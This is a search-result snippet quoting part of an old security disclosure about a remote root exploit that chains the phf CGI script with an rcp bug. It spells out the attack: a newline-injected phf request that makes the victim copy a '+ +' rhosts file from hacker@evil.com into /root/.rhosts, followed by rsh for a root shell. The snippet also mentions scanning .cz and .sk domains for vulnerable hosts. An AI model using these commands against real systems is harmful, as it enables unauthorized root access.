search for: 0arcp

...s passed to the phf script, it can execute arbitrary programs as user ''nobody''. So the problem with rcp can be exploited remotely, and root access can be gained from outside, for instance like this: $ echo "+ +" > /tmp/my.rhosts $ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+ /root/.rhosts" | nc -v - 20 victim.com 80 $ rsh -l root victim.com "/bin/sh -i" # The fact that this bug can be exploited remotely makes it, I think, quite serious. We wrote a simple script that searched our home domains (*.cz and *.sk) for machines t...